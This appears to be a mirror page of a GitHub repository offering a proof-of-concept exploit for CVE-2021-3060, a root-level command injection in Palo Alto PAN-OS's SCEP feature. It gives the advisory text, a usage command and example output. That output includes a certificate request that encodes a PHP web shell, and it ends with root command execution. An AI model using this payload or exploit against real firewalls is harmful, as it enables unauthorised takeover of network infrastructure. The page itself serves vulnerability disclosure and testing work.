Giters

anmolksachan / CVE-2021-3060

CVE-2021-3060

Home Page:https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-3060 POC/ Exploit

Description:

An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.

Weaknesses:

CWE-78

Link:

https://nvd.nist.gov/vuln/detail/CVE-2021-3060

example output:

$ python3 cve-2021-3060.py http://panw.local test-scep-profile
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: serialNumber=test, CN=uid=99(nobody) gid=99(nobody) groups=99(nobody)
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (512 bit)
                Modulus:
                    00:be:e2:cc:14:7e:94:ef:5d:59:1c:3b:17:92:c0:
                    34:ce:10:67:c7:c4:26:24:f1:52:b4:65:c7:a6:68:
                    c4:2b:ef:99:7c:f8:53:c3:ad:0b:f0:d0:8e:f2:62:
                    94:52:4c:1b:bb:c9:47:63:35:1b:f3:f6:fe:1b:f4:
                    d9:45:44:64:93
                Exponent: 65537 (0x10001)
        Attributes:
            challengePassword        :challenge
    Signature Algorithm: sha256WithRSAEncryption
         a9:c1:56:6d:86:4f:3e:d6:5a:99:33:37:f6:40:a6:7d:19:0c:
         63:3d:a2:bd:d1:45:e9:f2:50:b3:3c:65:fc:a7:9b:3e:81:64:
         d1:96:99:d6:f4:9b:a2:ed:3c:5d:da:ec:bb:69:55:e0:fc:59:
         53:30:3f:a7:ed:d6:71:da:a6:7e
-----BEGIN CERTIFICATE REQUEST-----
MIIBCTCBtAIBADA1MQ0wCwYDVQQFEwR0ZXN0MSQwIgYDVQQDFBs8P3BocCBwYXNz
dGhydSgkX0dFVFswXSk7Pz4wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAvuLMFH6U
711ZHDsXksA0zhBnx8QmJPFStGXHpmjEK++ZfPhTw60L8NCO8mKUUkwbu8lHYzUb
8/b+G/TZRURkkwIDAQABoBowGAYJKoZIhvcNAQkHMQsTCWNoYWxsZW5nZTANBgkq
hkiG9w0BAQsFAANBAKnBVm2GTz7WWpkzN/ZApn0ZDGM9or3RRenyULM8Zfynmz6B
ZNGWmdb0m6LtPF3a7LtpVeD8WVMwP6ft1nHapn4=
-----END CERTIFICATE REQUEST-----

uid=0(root) gid=0(root) groups=0(root)

Note: The script is an updated version picked from https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 and used python3.

About

CVE-2021-3060

https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756

Languages

Language:Python 100.0%